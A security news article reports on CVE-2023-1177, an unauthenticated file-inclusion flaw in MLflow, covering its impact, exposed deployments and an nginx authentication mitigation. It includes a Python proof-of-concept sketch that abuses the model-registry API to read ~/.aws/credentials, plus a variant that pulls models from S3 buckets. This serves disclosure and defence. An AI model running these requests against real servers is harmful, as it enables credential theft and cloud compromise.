A Major Flaw in the AI Testing Framework MLflow Can Compromise the Server and Data

The vulnerability is tracked as CVE-2023-1177 and is rated 10 (critical), the maximum severity score on the CVSS scale.
MLflow, an open-source framework used by many organizations to manage and record machine-learning experiments, has been patched for a critical vulnerability that could let attackers extract sensitive information, such as SSH keys and AWS credentials, from servers. Because MLflow does not enforce authentication by default, and a growing percentage of MLflow deployments are directly exposed to the internet, the attack can be carried out remotely and without authentication.

"Basically, every organization that uses this tool is at risk of losing their AI models, having an internal server compromised, and having their AWS account compromised," Dan McInerney, a senior security engineer with cybersecurity startup Protect AI, told CSO. "It's pretty brutal."

McInerney discovered the flaw and privately reported it to the MLflow project. It was fixed in version 2.2.1 of the framework, released three weeks ago, although the release notes made no mention of a security fix.

Path traversal used to include local and remote files

MLflow is a Python-based tool for automating machine-learning workflows. It includes a number of components that enable users to deploy models from various ML libraries, handle their lifecycle (including model versioning, stage transitions, and annotations), track experiments to record and compare parameters and results, and even package ML code in a reproducible format to share with other data scientists. A REST API and command-line interface are available for controlling MLflow.
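
To make that concrete, a typical tracking workflow looks something like the following (a minimal sketch using MLflow's documented Python API; the experiment, parameter, and file names are invented for illustration):

    import mlflow

    # Group related runs under a named experiment on the tracking server.
    mlflow.set_experiment("demo-experiment")

    # Record one training run: its parameters, a result metric, and an
    # output file ("artifact") for later comparison via the UI or REST API.
    with mlflow.start_run():
        mlflow.log_param("learning_rate", 0.01)
        mlflow.log_metric("accuracy", 0.93)
        mlflow.log_artifact("model.pkl")  # hypothetical local file

Everything logged this way is stored by the tracking server, which is exactly why these servers accumulate models, results, and artifacts worth stealing.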

All of these features combine to make the framework an invaluable resource for any organization experimenting with machine learning. Scans using the Shodan search engine bear this out, showing a steady increase in publicly exposed MLflow instances over the past two years, with the current count exceeding 800. However, many more MLflow deployments likely exist inside internal networks, where they may be reachable by attackers who gain a foothold in those networks.

"We reached out to our contacts at various Fortune 500s [and] they've all confirmed they're using MLflow internally for their AI engineering workflow," McInerney told CSO.

McInerney describes the flaw as local and remote file inclusion (LFI/RFI) via the API: remote, unauthenticated attackers can send specially crafted requests to the API endpoint that force MLflow to disclose the contents of any file the server process can read.
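
To illustrate the pattern, the attack can be sketched as three REST calls (a hypothetical proof-of-concept shape against a pre-2.2.1 server; the endpoints follow MLflow's documented model-registry API, but the target URL, file path, and payload details are assumptions rather than a verbatim exploit):

    import requests

    # Hypothetical unauthenticated, pre-2.2.1 MLflow server.
    BASE = "http://mlflow.example.com:5000"

    # 1. Register a model name -- an ordinary, documented API call.
    requests.post(f"{BASE}/api/2.0/mlflow/registered-models/create",
                  json={"name": "poc"})

    # 2. Create a model version whose "source" points at a local
    #    directory instead of a real artifact store -- the specially
    #    crafted request at the heart of CVE-2023-1177.
    requests.post(f"{BASE}/api/2.0/mlflow/model-versions/create",
                  json={"name": "poc",
                        "source": "file:///home/mlflow/.aws/"})

    # 3. Request an "artifact" from that version; a vulnerable build
    #    returns the raw contents of the referenced file.
    r = requests.get(f"{BASE}/model-versions/get-artifact",
                     params={"name": "poc", "version": "1",
                             "path": "credentials"})
    print(r.text)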

What makes the vulnerability worse is that most organizations configure their MLflow instances to store models and other sensitive data in Amazon S3 buckets. In a review by Protect AI of the configurations of publicly accessible MLflow instances, seven out of ten used AWS S3. This means attackers can supply the s3:// URL of the bucket used by the instance as the source parameter in their JSON request and steal models remotely.
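
Stealing models this way requires little more than swapping the local-file source in the crafted request for the bucket's URL (bucket name hypothetical):

    {"name": "poc", "source": "s3://acme-mlflow-artifacts/models/"}

On an unauthenticated instance, any remote user can then pull the bucket's artifacts back down through the same model-registry API.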

It also means that AWS credentials are most likely stored locally on the MLflow server so the framework can access its S3 buckets, typically in a file named credentials inside the .aws directory of the user's home (~/.aws/credentials). Disclosure of AWS credentials can be a serious security breach because, depending on the IAM policy attached to them, it can give attackers lateral-movement capabilities into an organization's AWS infrastructure.
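
That file follows the standard AWS CLI layout, so a single successful read hands an attacker ready-to-use keys (placeholder values shown):

    [default]
    aws_access_key_id = AKIAXXXXXXXXXXXXXXXX
    aws_secret_access_key = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx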

Insecure deployments result from a lack of default authentication

Requiring authentication to reach the API endpoint would prevent this flaw from being exploited, but MLflow does not implement any authentication mechanism of its own. Simple authentication with a static username and password can be bolted on by placing a proxy server, such as nginx, in front of the MLflow server and forcing all requests through it. Unfortunately, almost none of the publicly exposed instances use this configuration.
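
A minimal sketch of that setup, assuming MLflow is listening locally on its default port 5000 and an htpasswd file has already been created with the htpasswd utility (server name hypothetical):

    server {
        listen 80;
        server_name mlflow.internal.example.com;

        # Demand a static username/password before any request
        # reaches MLflow, which has no authentication of its own.
        auth_basic           "MLflow";
        auth_basic_user_file /etc/nginx/.htpasswd;

        location / {
            proxy_pass http://127.0.0.1:5000;
            proxy_set_header Host $host;
        }
    }

In production the proxy should also terminate TLS, since basic-auth credentials are otherwise sent in the clear.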

McInerney stated, "I can hardly call this a safe deployment of the tool, but at the very least, the safest deployment of MLflow as it stands currently is to keep it on an internal network, in a network segment that is partitioned away from all users except those who need to use it, and put behind an nginx proxy with basic authentication. This still doesn't prevent any user with access to the server from downloading other users' models and artifacts, but at the very least it limits the exposure. Exposing it on a public internet facing server assumes that absolutely nothing stored on the server or remote artifact store server contains sensitive data."